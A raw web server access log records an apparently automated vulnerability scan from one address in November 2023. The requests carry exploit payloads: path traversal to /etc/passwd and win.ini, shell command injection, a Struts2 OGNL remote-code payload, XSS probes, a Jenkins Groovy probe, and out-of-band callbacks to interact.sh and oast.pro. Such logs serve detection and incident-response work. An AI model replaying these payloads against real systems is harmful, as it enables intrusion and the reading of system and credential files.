B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 367 2023-11-09 18:34:02 103.153.214.94 GET /dumpmdm.cmd - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 373 2023-11-09 18:34:49 103.153.214.94 GET /+CSCOE+/files/file_list.json path=/sessions 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 11 0 380 2023-11-09 18:34:52 103.153.214.94 POST /jolokia/read/getDiagnosticOptions - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 388 2023-11-09 18:35:19 103.153.214.94 POST /cobbler_api - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 367 2023-11-09 18:35:26 103.153.214.94 GET /verify.php id=1&confirm_hash 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 361 2023-11-09 18:35:29 103.153.214.94 GET /mantis/verify.php id=1&confirm_hash 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 361 2023-11-09 18:35:32 103.153.214.94 GET /mantisBT/verify.php id=1&confirm_hash 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 361 2023-11-09 18:35:38 103.153.214.94 GET /mantisbt-2.3.0/verify.php id=1&confirm_hash 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 360 2023-11-09 18:35:39 103.153.214.94 GET /sympa referer=http://interact.sh&passwd&previous_action&action=login&action_login&previous_list&list&email 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 361 2023-11-09 18:35:39 103.153.214.94 GET /bugs/verify.php confirm_hash&id=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 363 2023-11-09 18:36:06 103.153.214.94 GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword apiUrl=http://cl6fbhsfe7k9sg331pog5yugm8n36afew.oast.pro 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 363 2023-11-09 18:36:15 103.153.214.94 POST /struts2-rest-showcase/orders/3 - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 365 2023-11-09 18:36:18 103.153.214.94 POST /orders/3 - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 363 2023-11-09 18:36:23 103.153.214.94 GET / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 404 2023-11-09 18:36:29 103.153.214.94 GET /api/jolokia/read<svg+onload=alert(document.domain)> mimeType=text/html 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 400 0 0 410 2023-11-09 18:36:33 103.153.214.94 GET /jolokia/read<svg+onload=alert(document.domain)> mimeType=text/html 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 1099 2023-11-09 18:36:42 103.153.214.94 GET /global-protect/login.esp user=j%22;-alert(1)-%22x 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 1030 2023-11-09 18:37:02 103.153.214.94 GET /command.cgi cat%20/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 361 2023-11-09 18:37:10 103.153.214.94 GET /dolibarr/adherents/cartes/carte.php mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 368 2023-11-09 18:37:10 103.153.214.94 GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 366 2023-11-09 18:38:40 103.153.214.94 GET /index.php debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 366 2023-11-09 18:42:00 103.153.214.94 POST /system/sharedir.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 384 2023-11-09 18:42:03 103.153.214.94 POST /en/php/usb_sync.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 371 2023-11-09 18:42:14 103.153.214.94 POST /GponForm/diag_Form images/ 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 388 2023-11-09 18:42:17 103.153.214.94 POST /GponForm/diag_Form images/ 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 390 2023-11-09 18:42:42 103.153.214.94 GET /uir/etc/passwd - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 367 2023-11-09 18:43:09 103.153.214.94 GET /chkisg.htm?Sip=1.1.1.1+|+cat+/etc/passwd - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 364 2023-11-09 18:43:16 103.153.214.94 POST /admin/index.php id=pages 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 364 2023-11-09 18:43:42 103.153.214.94 POST /upload/index.php route=extension/payment/divido/update 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 371 2023-11-09 18:43:51 103.153.214.94 GET /index.php/community/ %3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 362 2023-11-09 18:44:23 103.153.214.94 GET /users/registration - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 368 2023-11-09 18:45:03 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../windows/win.ini - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 371 2023-11-09 18:45:08 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../windows/win.ini - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 366 2023-11-09 18:45:09 103.153.214.94 GET /..../..../..../..../..../..../..../..../..../windows/win.ini - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 373 2023-11-09 18:45:12 103.153.214.94 GET /..../..../..../..../..../..../..../..../..../windows/win.ini - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 369 2023-11-09 18:45:12 103.153.214.94 GET /interact.sh - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 363 2023-11-09 18:45:32 103.153.214.94 GET /${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('cat+/etc/passwd').getInputStream(),#b=new+java.io.InputStreamReader(#a),#c=new++java.io.BufferedReader(#b),#d=new+char[51020],#c.read(#d),#sbtest=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#sbtest.println(#d),#sbtest.close())}/actionChain1.action - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 391 2023-11-09 18:45:41 103.153.214.94 GET /cgi-bin/login LD_DEBUG=files 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 362 2023-11-09 18:45:46 103.153.214.94 GET /cms/info.php mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 361 2023-11-09 18:45:57 103.153.214.94 GET /en-US/splunkd/__raw/services/server/info/server-info output_mode=json 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 365 2023-11-09 18:46:00 103.153.214.94 GET /__raw/services/server/info/server-info output_mode=json 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 370 2023-11-09 18:46:12 103.153.214.94 GET /img.php f=/./etc/./passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 364 2023-11-09 18:46:42 103.153.214.94 GET /jkstatus - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 364 2023-11-09 18:46:45 103.153.214.94 GET /jkstatus; - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 1101 2023-11-09 18:47:13 103.153.214.94 POST /api/external/7.0/system.System.get_infos - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 369 2023-11-09 18:47:22 103.153.214.94 GET /echo-server.html code=test&state=http://www.interact.sh 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 361 2023-11-09 18:47:53 103.153.214.94 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 374 2023-11-09 18:47:56 103.153.214.94 GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 363 2023-11-09 18:47:56 103.153.214.94 GET /server/node_upgrade_srv.js action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 369 2023-11-09 18:47:58 103.153.214.94 GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 362 2023-11-09 18:47:59 103.153.214.94 GET /server/node_upgrade_srv.js action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 369 2023-11-09 18:48:00 103.153.214.94 GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 367 2023-11-09 18:48:05 103.153.214.94 GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 381 2023-11-09 18:48:07 103.153.214.94 GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 366 2023-11-09 18:50:11 103.153.214.94 GET /index.php target=db_sql.php%253f/../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 367 2023-11-09 18:51:14 103.153.214.94 GET /html/log - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 364 2023-11-09 18:51:29 103.153.214.94 GET /web/cgi-bin/hi3510/param.cgi cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 361 2023-11-09 18:52:06 103.153.214.94 GET /index.php op=fileviewer&file=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 375 2023-11-09 18:52:20 103.153.214.94 PUT /meta - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 367 2023-11-09 18:52:29 103.153.214.94 GET /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 364 2023-11-09 18:52:56 103.153.214.94 GET /remote/fgt_lang lang=/../../../..//////////dev/cmdb/sslvpn_websession 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 367 2023-11-09 18:53:46 103.153.214.94 GET /static/%5c%5c..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/windows/win.ini - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 11 0 394 2023-11-09 18:53:48 103.153.214.94 GET /spring-mvc-showcase/resources/%5c%5c..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/windows/win.ini - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 11 0 365 2023-11-09 18:54:20 103.153.214.94 GET /zimbra/h/search si=1&so=0&sfi=4&st=message&csi=1&action&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 370 2023-11-09 18:54:32 103.153.214.94 GET /assets/php/filebrowser/filebrowser.main.php file=../../../../../../../../../../etc/passwd&do=download 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 366 2023-11-09 18:54:41 103.153.214.94 GET /www.interact.sh - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 361 2023-11-09 18:54:49 103.153.214.94 POST /filemanager/upload.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 370 2023-11-09 18:54:56 103.153.214.94 POST /account - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 360 2023-11-09 18:54:58 103.153.214.94 POST /account - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 361 2023-11-09 18:55:45 103.153.214.94 GET /message title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 369 2023-11-09 18:55:48 103.153.214.94 GET /remote/error errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 1037 2023-11-09 18:56:11 103.153.214.94 GET /cgit/cgit.cgi/git/objects/ path=../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 366 2023-11-09 18:56:14 103.153.214.94 GET /webui/file_guest path=/var/www/documentation/../../../../../etc/passwd&flags=1152 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 388 2023-11-09 18:56:23 103.153.214.94 GET /login next=http://interact.sh/?app.scan/ 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 364 2023-11-09 18:56:26 103.153.214.94 GET /signup next=http://interact.sh/?app.scan/ 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 363 2023-11-09 18:57:07 103.153.214.94 GET /IntellectMain.jsp IntellectSystem=https://www.interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 363 2023-11-09 18:58:42 103.153.214.94 GET /index.php/System/MailConnect/host/cl6fbhsfe7k9sg331pogtx5f8w7y8ka1r.oast.pro/port/80/secure/ - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 368 2023-11-09 19:00:05 103.153.214.94 GET /filemanager/ajax_calls.php action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 369 2023-11-09 19:00:18 103.153.214.94 GET /ipecs-cm/download filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 362 2023-11-09 19:00:20 103.153.214.94 GET /ipecs-cm/download filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 362 2023-11-09 19:00:22 103.153.214.94 GET /WEBACCOUNT.CGI OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID&WEBACCOUNTPASSWORD 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 362 2023-11-09 19:00:55 103.153.214.94 POST /fcgi-bin/wgsetcgi - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 1477 2023-11-09 19:01:34 103.153.214.94 GET /bibliopac/bin/wxis.exe/bibliopac/ IsisScript=bibliopac/bin/bibliopac.xic&db="><script>prompt(document.domain)</script> 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 8 0 367 2023-11-09 19:01:58 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 362 2023-11-09 19:02:29 103.153.214.94 GET /session/language last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login&CipheredValue 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 363 2023-11-09 19:02:32 103.153.214.94 GET /session/login - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 380 2023-11-09 19:02:40 103.153.214.94 POST /upload - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 366 2023-11-09 19:03:05 103.153.214.94 POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 374 2023-11-09 19:03:07 103.153.214.94 GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2XwZKqHkZR9V3rQTzDBQksm5hxP.jsp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 370 2023-11-09 19:03:14 103.153.214.94 GET /wp-content/plugins/wechat-broadcast/wechat/Image.php url=../../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 1104 2023-11-09 19:03:31 103.153.214.94 GET /wp-content/plugins/localize-my-post/ajax/include.php file=../../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 367 2023-11-09 19:03:42 103.153.214.94 GET /nuxeo/login.jsp/pwn${31333333330+7}.xhtml - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 11 0 362 2023-11-09 19:04:39 103.153.214.94 GET /html/repository - 443 - 101.35.195.134 